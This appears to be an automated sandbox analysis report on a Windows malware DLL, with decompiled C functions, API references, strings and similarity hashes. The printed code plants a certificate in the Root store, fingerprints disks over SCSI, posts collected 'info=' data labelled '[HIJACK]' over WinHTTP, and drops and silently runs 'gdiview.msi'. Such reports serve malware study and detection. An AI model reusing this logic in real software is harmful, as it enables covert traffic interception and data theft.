				_t44 = E1001F680(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8);
				_t95 = _t44;
				if(_t44 != 0) {
					_t46 = E1001F680(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8);
					_t96 = _t46;
					if(_t46 != 0) {
						_t48 = E1001F5F0( &_v532, _t96,  &_v532, _a4, _a8);
						_t97 = _t48;
						if(_t48 != 0) {
							_t50 = E1001F680( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8);
							_t98 = _t50;
							if(_t50 != 0) {
								_t52 = E1001F680(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8);
								_t99 = _t52;
								if(_t52 != 0 && E1001F5F0(_a4, _t99,  &_v804, _a4, _a8) != 0) {
									_t55 = E1001F720(__ebx, _t77, __esi, _a4, _a8);
									_t101 = _t55;
									if(_t55 != 0 && E1001F680( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8) != 0) {
										_v536 = 1;
									}
								}
							}
						}
					}
				}
				return _v536;
			}

0x1001fa30
0x1001fa30
0x1001fa39
0x1001fa43
0x1001fa58
0x1001fa6d
0x1001fa84
0x1001fa8c
0x1001faa1
0x1001fab6
0x1001facd
0x1001fad5
0x1001faea
0x1001faf9
0x1001fb13
0x1001fb1b
0x1001fb1d
0x1001fb35
0x1001fb3d
0x1001fb3f
0x1001fb54
0x1001fb5c
0x1001fb5e
0x1001fb76
0x1001fb7e
0x1001fb80
0x1001fb94
0x1001fb9c
0x1001fb9e
0x1001fbc3
0x1001fbcb
0x1001fbcd
0x1001fbef
0x1001fbef
0x1001fbcd
0x1001fb9e
0x1001fb80
0x1001fb5e
0x1001fb3f
0x1001fc02

APIs

_memset.LIBCMT ref: 1001FA58
SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FA6D
_strcat_s.LIBCMT ref: 1001FA84
_memset.LIBCMT ref: 1001FAA1
SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FAB6
_strcat_s.LIBCMT ref: 1001FACD
_memset.LIBCMT ref: 1001FAEA

Part of subcall function 1001F990: _memset.LIBCMT ref: 1001F9AE
Part of subcall function 1001F990: _strcat_s.LIBCMT ref: 1001F9E1
Part of subcall function 1001F990: _sprintf.LIBCMT ref: 1001FA08

Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
Part of subcall function 1001F720: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
Part of subcall function 1001F720: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
Part of subcall function 1001F720: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
Part of subcall function 1001F720: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
Part of subcall function 1001F720: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C

Strings

\Microsoft\Windows\win_a.dat, xrefs: 1001FA73
SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB2B
SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FB6C
SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FB8A
\Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FABC
SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB09

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
API String ID: 475603772-4188859120
Opcode ID: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
Instruction ID: cda2b8cdb8d0272306c20495e764daec9aa036c5edc3e57df8df2dc1c216ebbd
Opcode Fuzzy Hash: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
Instruction Fuzzy Hash: D941457A944208B7EB04DB94EC86FF93368DB68344F14845CFB1C9A182E670EB848761

Uniqueness

Uniqueness Score: -1.00%

Function 100211B0, Relevance: 16.7, APIs: 11, Instructions: 232
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100211B0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24) {
				char _v8;
				char _v12;
				char* _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v35;
				char _v39;
				char _v43;
				char _v44;
				void* _t86;
				void* _t88;
				intOrPtr _t91;
				void* _t92;
				void* _t120;
				void* _t140;
				void* _t141;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t196;

				_t192 = __esi;
				_t191 = __edi;
				_t141 = __ebx;
				_v32 = 0;
				_v20 = "https://";
				_v16 = "http://";
				_v12 = 0;
				_v8 = 0;
				_v28 = 0;
				_v24 = 0;
				_v44 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_t86 = E10001A50(_a4, _v20);
				_t194 = _t193 + 8;
				if(_t86 != 0) {
					L2:
					_v8 = _a4;
					_t88 = E10001A50(_a4, _v20);
					_t195 = _t194 + 8;
					if(_t88 == 0) {
						 *_a8 = 0;
						_v8 = _v8 + 7;
						 *_a20 = 0x50;
					} else {
						 *_a8 = 1;
						_v8 = _v8 + 8;
						 *_a20 = 0x1bb;
					}
					_t91 = E10001A50(_v8, "/");
					_t196 = _t195 + 8;
					_v28 = _t91;
					if(_v28 == 0) {
						_t92 = E1000CAC0(_v8);
						_t196 = _t196 + 4;
						_v24 = _t92 + 1;
					} else {
						_v24 = _v28 - _v8 + 1;
					}
					 *_a12 = L1000CE56(_t141, _v24, _t191, _t192, _v24);
					E1000CF20(_t191,  *_a12, 0, _v24);
					E1000D190(_t141, _t191, _t192,  *_a12, _v8, _v24 - 1);
					_v28 = E10001A50(_v8, "/");
					if(_v28 == 0) {
						_v24 = 2;
						 *_a24 = L1000CE56(_t141, _v24, _t191, _t192, _v24);
						E1000CF20(_t191,  *_a24, 0, _v24);
						E1000E280( *_a24, "/");
					} else {
						_v24 = E1000CAC0(_v8) - _v28 - _v8 + 1;
						 *_a24 = L1000CE56(_t141, _v28 - _v8, _t191, _t192, _v24);
						E1000CF20(_t191,  *_a24, 0, _v24);
						E1000E280( *_a24, _v28);
					}
					_v8 = E10001A50( *_a12, ":");
					if(_v8 == 0) {
						_t181 = _a12;
						_v24 = E1000CAC0( *_a12) + 1;
					} else {
						_v24 = _v8 -  *_a12 + 1;
						_t120 = E1000CAC0( *_a12);
						_t181 =  &_v44;
						E1000D190(_t141, _t191, _t192,  &_v44, _v8 + 1, _t120 - _v24);
						E1000E5E5( &_v44, "%d", _a20);
					}
					 *_a16 = L1000CE56(_t141, _t181, _t191, _t192, _v24);
					E1000CF20(_t191,  *_a16, 0, _v24);
					E1000D190(_t141, _t191, _t192,  *_a16,  *_a12, _v24 - 1);
					_v32 = 1;
				} else {
					_t140 = E10001A50(_a4, _v16);
					_t194 = _t194 + 8;
					if(_t140 != 0) {
						goto L2;
					}
				}
				return _v32;
			}

0x100211b0
0x100211b0
0x100211b0
0x100211b6
0x100211bd
0x100211c4
0x100211cb
0x100211d2
0x100211d9
0x100211e0
0x100211e7
0x100211ed
0x100211f0
0x100211f3
0x100211fe
0x10021203
0x10021208
0x10021222
0x10021225
0x10021230
0x10021235
0x1002123a
0x1002125c
0x10021268
0x1002126e
0x1002123c
0x1002123f
0x1002124b
0x10021251
0x10021251
0x1002127d
0x10021282
0x10021285
0x1002128c
0x100212a0
0x100212a5
0x100212ab
0x1002128e
0x10021297
0x10021297
0x100212bd
0x100212cb
0x100212e4
0x100212fd
0x10021304
0x10021359
0x1002136f
0x1002137d
0x10021390
0x10021306
0x1002131d
0x1002132f
0x1002133d
0x1002134f
0x10021354
0x100213ab
0x100213b2
0x100213fe
0x1002140f
0x100213b4
0x100213bf
0x100213c8
0x100213db
0x100213df
0x100213f4
0x100213f9
0x10021421
0x1002142f
0x1002144a
0x10021452
0x1002120a
0x10021212
0x10021217
0x1002121c
0x00000000
0x00000000
0x1002121c
0x1002145f

APIs

_strlen.LIBCMT ref: 100212A0
_memset.LIBCMT ref: 100212CB
_strlen.LIBCMT ref: 1002130A
_memset.LIBCMT ref: 1002133D
_strcat.LIBCMT ref: 1002134F
_memset.LIBCMT ref: 1002137D
_strcat.LIBCMT ref: 10021390
_strlen.LIBCMT ref: 100213C8
_sscanf.LIBCMT ref: 100213F4

Part of subcall function 1000E5E5: _vscan_fn.LIBCMT ref: 1000E5FA

_strlen.LIBCMT ref: 10021404
_memset.LIBCMT ref: 1002142F

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset_strlen$_strcat$_sscanf_vscan_fn
String ID:
API String ID: 3056589307-0
Opcode ID: 9f2506d15e32d62062d7e27f21625b1247e6a1efb5e08f0102daee32226561f0
Instruction ID: b73e38e492334931c567e70ec6057ca77ce0bc3bbcd211be2433ac406d63848b
Opcode Fuzzy Hash: 9f2506d15e32d62062d7e27f21625b1247e6a1efb5e08f0102daee32226561f0
Instruction Fuzzy Hash: E3911BB9E00209EFDB00CFA4D991EAFB7B5FF48344F104568F905AB345E635AA14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001D560, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1001D560(void* __edi, char* _a4) {
				intOrPtr _v8;
				struct _OVERLAPPED* _v12;
				signed int _v16;
				struct _OVERLAPPED* _v20;
				struct _OVERLAPPED* _v24;
				intOrPtr _v28;
				void* _v32;
				short _v548;
				char _v1010;
				char _v1068;
				char _v1070;
				intOrPtr _v1084;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				void _v1108;
				char _v2132;
				struct _OVERLAPPED* _v2136;
				char _v2137;
				long _v2144;
				struct _OVERLAPPED* _v2148;
				intOrPtr _v2152;
				char* _v2156;
				intOrPtr _t91;
				intOrPtr _t96;
				void* _t125;
				void* _t126;
				void* _t127;

				_t125 = __edi;
				_v20 = 0;
				_v2136 = 0;
				_v24 = 0;
				do {
					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20);
					_t127 = _t127 + 0xc;
					_v32 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0);
					if(_v32 != 0xffffffff) {
						_v12 = 0;
						while(1 != 0) {
							E1000CF20(_t125,  &_v1108, 0, 0x22d);
							_t127 = _t127 + 0xc;
							_v1104 = 0x49534353;
							_v1100 = 0x4b534944;
							_v1068 = _v12;
							_v1108 = 0x1c;
							_v1096 = 0x2710;
							_v1084 = 0x211;
							_v1092 = 0x1b0501;
							_v1070 = 0xec;
							if(DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0) == 0 || _v1010 == 0) {
								L20:
								if(_v2136 != 0) {
									L23:
								} else {
									_v12 =  &(_v12->Internal);
									if(_v12 < 2) {
										goto L23;
									} else {
										continue;
									}
								}
							} else {
								_v16 = 0;
								do {
									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
									_v16 = _v16 + 1;
								} while (_v16 < 0x100);
								_t91 = E1001CD70( &_v2132);
								_t127 = _t127 + 4;
								_v28 = _t91;
								_v2148 = 0;
								_v8 = 0x104;
								_v2156 = _a4;
								_v2152 = _v28 - _a4;
								while(_v8 != 0x80000106) {
									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
									if(_v2137 != 0) {
										 *_v2156 = _v2137;
										_v2156 = _v2156 + 1;
										_t96 = _v8 - 1;
										_v8 = _t96;
										if(_t96 != 0) {
											continue;
										} else {
											L17:
											_v2156 = _v2156 - 1;
											_v2148 = 0x8007007a;
										}
									} else {
										break;
									}
									L18:
									 *_v2156 = 0;
									if(_v2148 < 0) {
										goto L20;
									} else {
										goto L24;
									}
									goto L25;
								}
								if(_v8 == 0) {
									goto L17;
								} else {
								}
								goto L18;
							}
							L25:
							CloseHandle(_v32);
							_v20 = _v24;
							goto L26;
						}
						L24:
						_v2136 = 1;
						goto L25;
					}
					L26:
					_v20 =  &(_v20->Internal);
					_v24 = _v20;
				} while (_v20 < 0x10);
				return _v2136;
			}

0x1001d560
0x1001d569
0x1001d570
0x1001d57a
0x1001d581
0x1001d591
0x1001d597
0x1001d5b6
0x1001d5bd
0x1001d5c3
0x1001d5ca
0x1001d5e5
0x1001d5ea
0x1001d5ed
0x1001d5f7
0x1001d604
0x1001d60a
0x1001d614
0x1001d61e
0x1001d628
0x1001d632
0x1001d668
0x1001d76e
0x1001d775
0x1001d78d
0x1001d777
0x1001d780
0x1001d786
0x00000000
0x1001d788
0x00000000
0x1001d788
0x1001d786
0x1001d67d
0x1001d67d
0x1001d684
0x1001d692
0x1001d69f
0x1001d6a2
0x1001d6b2
0x1001d6b7
0x1001d6ba
0x1001d6bd
0x1001d6c7
0x1001d6d1
0x1001d6dd
0x1001d6e3
0x1001d6fa
0x1001d709
0x1001d719
0x1001d724
0x1001d72d
0x1001d730
0x1001d733
0x00000000
0x1001d735
0x1001d741
0x1001d74a
0x1001d750
0x1001d750
0x1001d70b
0x00000000
0x1001d70b
0x1001d75a
0x1001d760
0x1001d76a
0x00000000
0x1001d76c
0x00000000
0x1001d76c
0x00000000
0x1001d76a
0x1001d73d
0x00000000
0x00000000
0x1001d73f
0x00000000
0x1001d73d
0x1001d79e
0x1001d7a2
0x1001d7ab
0x00000000
0x1001d7ab
0x1001d794
0x1001d794
0x00000000
0x1001d794
0x1001d7ae
0x1001d7b4
0x1001d7ba
0x1001d7bd
0x1001d7d0

APIs

wsprintfW.USER32 ref: 1001D591
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D5B0
_memset.LIBCMT ref: 1001D5E5
DeviceIoControl.KERNEL32 ref: 1001D660
CloseHandle.KERNEL32(000000FF), ref: 1001D7A2

Strings

SCSI, xrefs: 1001D5ED
DISK, xrefs: 1001D5F7
\\.\Scsi%d:, xrefs: 1001D585
z, xrefs: 1001D750

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseControlCreateDeviceFileHandle_memsetwsprintf
String ID: DISK$SCSI$\\.\Scsi%d:$z
API String ID: 3873020565-153650326
Opcode ID: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
Instruction ID: ecac459a45c55c39d0c7666526aefe1c13258bf2a5e68f6ccc56cd30cf696479
Opcode Fuzzy Hash: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
Instruction Fuzzy Hash: 8C613AB4D04258DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB281DB759AC4CF95

Uniqueness

Uniqueness Score: -1.00%

Function 10022760, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10022760(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v72;
				char _v100;
				char _v128;
				intOrPtr _v132;
				char _v160;
				char _v188;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				void* __ebp;
				void* _t75;
				void* _t76;
				intOrPtr _t119;
				void* _t127;

				_t127 = __eflags;
				_t118 = __esi;
				_t117 = __edi;
				_t87 = __ebx;
				_push(0xffffffff);
				_push(E10022C17);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t119;
				_v192 = 0;
				_push(_a12);
				_push(0x30);
				_push("post_info");
				E1001F1D0(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", PathFindFileNameA(".\\post_info.cpp"));
				_v132 = E100223F0(__ebx, __edi, __esi, _t127, _a12);
				E100225D0(__ebx, __edi, __esi, _t127,  &_v128);
				_v8 = 0;
				_v196 = E10001160( &_v160, _t127, _a8);
				_v200 = _v196;
				_v8 = 1;
				E10001A70( &_v128, _v200);
				_v8 = 0;
				E100011A0( &_v160);
				E10001160( &_v100, _t127, "info=");
				_v8 = 2;
				_v204 = E10001160( &_v188, _t127, _v132);
				_v208 = _v204;
				_v8 = 3;
				E10001A70( &_v100, _v208);
				_v8 = 2;
				E100011A0( &_v188);
				_push(E100011E0( &_v128));
				_push(0x3d);
				_push("post_info");
				E1001F1D0(_t117, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp"));
				E10001160( &_v44, _t127, 0x10024ca2);
				_v8 = 4;
				E10001160( &_v72, _t127, 0x10024ca3);
				_v8 = 5;
				_t75 = E10001200( &_v100);
				_t76 = E100011E0( &_v100);
				E10021AF0(__ebx, _t117, __esi, _t127, 0, 0, 0, E100011E0( &_v128), 2, 1, 0, _t76, _t75, 0, 0, 0, 0, 0, 0,  &_v44,  &_v72);
				_push(_v132);
				E1000CA30(_t87, _t117, _t118, _t127);
				E10001110(_a4, _t127,  &_v72);
				_v192 = _v192 | 0x00000001;
				_v8 = 4;
				E100011A0( &_v72);
				_v8 = 2;
				E100011A0( &_v44);
				_v8 = 0;
				E100011A0( &_v100);
				_v8 = 0xffffffff;
				E100011A0( &_v128);
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x10022760
0x10022760
0x10022760
0x10022760
0x10022763
0x10022765
0x10022770
0x10022771
0x1002277e
0x1002278b
0x1002278c
0x1002278e
0x100227a4
0x100227b8
0x100227bf
0x100227c7
0x100227dd
0x100227e9
0x100227ef
0x100227fd
0x10022802
0x1002280c
0x10022819
0x1002281e
0x10022831
0x1002283d
0x10022843
0x10022851
0x10022856
0x10022860
0x1002286d
0x1002286e
0x10022870
0x10022886
0x10022896
0x1002289b
0x100228a7
0x100228ac
0x100228c7
0x100228d0
0x100228eb
0x100228f6
0x100228f7
0x10022906
0x10022914
0x1002291a
0x10022921
0x10022926
0x1002292d
0x10022932
0x10022939
0x1002293e
0x10022948
0x10022953
0x1002295d

APIs

PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000030,?), ref: 10022798

Part of subcall function 1001F1D0: _memset.LIBCMT ref: 1001F1FB
Part of subcall function 1001F1D0: OutputDebugStringA.KERNEL32(?,?,?,?,?,100227A9,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F233

Part of subcall function 100223F0: _memset.LIBCMT ref: 10022444
Part of subcall function 100223F0: _strlen.LIBCMT ref: 10022478
Part of subcall function 100223F0: _memset.LIBCMT ref: 100224E6
Part of subcall function 100223F0: _strlen.LIBCMT ref: 100224F2

Part of subcall function 100225D0: _memset.LIBCMT ref: 10022624
Part of subcall function 100225D0: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
Part of subcall function 100225D0: _sprintf.LIBCMT ref: 10022666

PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,0000003D,00000000,?,?,info=,?,?), ref: 1002287A

Part of subcall function 10021AF0: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021C24
Part of subcall function 10021AF0: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021C6C

Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9

Strings

.\post_info.cpp, xrefs: 10022793
post_info, xrefs: 1002278E
[HIJACK][%s][%s][%d]: url = %s, xrefs: 10022881
[HIJACK][%s][%s][%d]: data = %s, xrefs: 1002279F
info=, xrefs: 10022811
.\post_info.cpp, xrefs: 10022875
post_info, xrefs: 10022870

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$FileFindHttpNamePath_strlen$DebugErrorFreeHeapLastLocalOpenOptionOutputStringTime___sbh_find_block___sbh_free_block_sprintf
String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
API String ID: 728604215-152146038
Opcode ID: 595fa8cd932e3625ab91877eb1d9ec3bfaedeea9d9515ddbb056345a5ee8ff59
Instruction ID: 42968dd6338b29c892dd1ec079196b21a890ae0ab2ff2efbcc3c73078d1eef52
Opcode Fuzzy Hash: 595fa8cd932e3625ab91877eb1d9ec3bfaedeea9d9515ddbb056345a5ee8ff59
Instruction Fuzzy Hash: 38515F75C01258EBEB14DB94DC52FDEBB74EF18380F504198F60A67286DB702B04CB52

Uniqueness

Uniqueness Score: -1.00%

Function 1001A480, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1001A480(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char* _a4) {
				signed int _v8;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				void* __ebp;
				void* _t36;
				void* _t75;
				void* _t80;
				void* _t81;

				_t74 = __esi;
				_t73 = __edi;
				_t57 = __ebx;
				_v8 = 0;
				_v176 = L1000CE56(__ebx, __edx, __edi, __esi, 0x10);
				_v168 = L1000CE56(__ebx, __edx, __edi, __esi, 0x21);
				E1000CF20(__edi, _v168, 0, 0x21);
				E1000CF20(_t73, _v176, 0, 0x10);
				_t67 = _a4;
				_t36 = E1000CAC0(_a4);
				_t80 = _t75 + 0x24;
				if(_t36 <= 0) {
					E1000E280(_v168, "00000000000000000000000000000000");
					_t81 = _t80 + 8;
				} else {
					E1001BC10( &_v164);
					E1001CAC0( &_v164, _a4, E1000CAC0(_a4));
					_t67 =  &_v164;
					E1001CBC0( &_v164, _v176);
					_t81 = _t80 + 0x1c;
					_v8 = 0;
					while(_v8 < 0x10) {
						_t67 = _v168 + _v8 * 2;
						E1000CC93(_t73, _v168 + _v8 * 2, "%02X",  *(_v176 + _v8) & 0xff);
						_t81 = _t81 + 0xc;
						_v8 = _v8 + 1;
					}
				}
				_push(_v176);
				E1000CA30(_t57, _t73, _t74, __eflags);
				_v172 = L1000CE56(_t57, _t67, _t73, _t74, 0x11);
				E1000CF20(_t73, _v172, 0, 0x11);
				__eflags = _v168 + 8;
				E1000D190(_t57, _t73, _t74, _v172, _v168 + 8, 0x10);
				_push(_v168);
				E1000CA30(_t57, _t73, _t74, __eflags);
				return _v172;
			}

0x1001a480
0x1001a480
0x1001a480
0x1001a489
0x1001a49a
0x1001a4aa
0x1001a4bb
0x1001a4ce
0x1001a4d6
0x1001a4da
0x1001a4df
0x1001a4e4
0x1001a584
0x1001a589
0x1001a4ea
0x1001a4f1
0x1001a511
0x1001a520
0x1001a527
0x1001a52c
0x1001a52f
0x1001a541
0x1001a568
0x1001a56c
0x1001a571
0x1001a53e
0x1001a53e
0x1001a576
0x1001a592
0x1001a593
0x1001a5a5
0x1001a5b6
0x1001a5c6
0x1001a5d1
0x1001a5df
0x1001a5e0
0x1001a5f1

APIs

_memset.LIBCMT ref: 1001A4BB
_memset.LIBCMT ref: 1001A4CE
_strlen.LIBCMT ref: 1001A4DA
_strlen.LIBCMT ref: 1001A4FD

Part of subcall function 1001CAC0: und_memcpy.LIBCMTD ref: 1001CB3C
Part of subcall function 1001CAC0: und_memcpy.LIBCMTD ref: 1001CBB1

_sprintf.LIBCMT ref: 1001A56C
_strcat.LIBCMT ref: 1001A584
_memset.LIBCMT ref: 1001A5B6

Strings

00000000000000000000000000000000, xrefs: 1001A578
%02X, xrefs: 1001A55A

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_strlenund_memcpy$_sprintf_strcat
String ID: %02X$00000000000000000000000000000000
API String ID: 796335831-606320477
Opcode ID: cddf9aa94f1a26cbff01d8f54016213bcb26ef308eb76885f362afd6834819d9
Instruction ID: 5f34500701607727b308b008c02476916cf30523b6eb1de7e1c0da2fd1923ee1
Opcode Fuzzy Hash: cddf9aa94f1a26cbff01d8f54016213bcb26ef308eb76885f362afd6834819d9
Instruction Fuzzy Hash: 6D3162BAE0030CABEB10DB60DC42FAE7375DF46344F0444A4F9496B246E671EB949B93

Uniqueness

Uniqueness Score: -1.00%

Function 1001FC70, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001FC70(void* __edi, void* __eflags) {
				char _v1027;
				char _v1028;
				char _v1291;
				char _v1292;
				int _t21;

				_t29 = __edi;
				_v1292 = 0;
				E1000CF20(__edi,  &_v1291, 0, 0x103);
				_v1028 = 0;
				E1000CF20(_t29,  &_v1027, 0, 0x3ff);
				GetTempPathA(0x104,  &_v1292);
				E1000CD96( &_v1292,  &_v1292, 0x104, "gdiview.msi");
				E1000CC93(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292);
				E1001FC10( &_v1292, 0x10026888, 0x39e00);
				_t21 = PathFileExistsA( &_v1292);
				_t38 = _t21;
				if(_t21 != 0) {
					return E1001A1D0(_t38,  &_v1028);
				}
				return _t21;
			}

0x1001fc70
0x1001fc79
0x1001fc8e
0x1001fc96
0x1001fcab
0x1001fcbf
0x1001fcd6
0x1001fcf1
0x1001fd0a
0x1001fd19
0x1001fd1f
0x1001fd21
0x00000000
0x1001fd2f
0x1001fd35

APIs

_memset.LIBCMT ref: 1001FC8E
_memset.LIBCMT ref: 1001FCAB
GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FCBF
_strcat_s.LIBCMT ref: 1001FCD6
_sprintf.LIBCMT ref: 1001FCF1

Part of subcall function 1001FC10: CreateFileA.KERNEL32(10026888,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC33
Part of subcall function 1001FC10: WriteFile.KERNEL32(00039E00,00000000,00000000,10026888,00000000), ref: 1001FC4E
Part of subcall function 1001FC10: CloseHandle.KERNEL32(00039E00), ref: 1001FC63

PathFileExistsA.SHLWAPI(00000000), ref: 1001FD19

Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
Part of subcall function 1001A1D0: CreateProcessA.KERNEL32 ref: 1001A22B
Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243

Strings

msiexec.exe /i "%s", xrefs: 1001FCE5
gdiview.msi, xrefs: 1001FCC5

Memory Dump Source

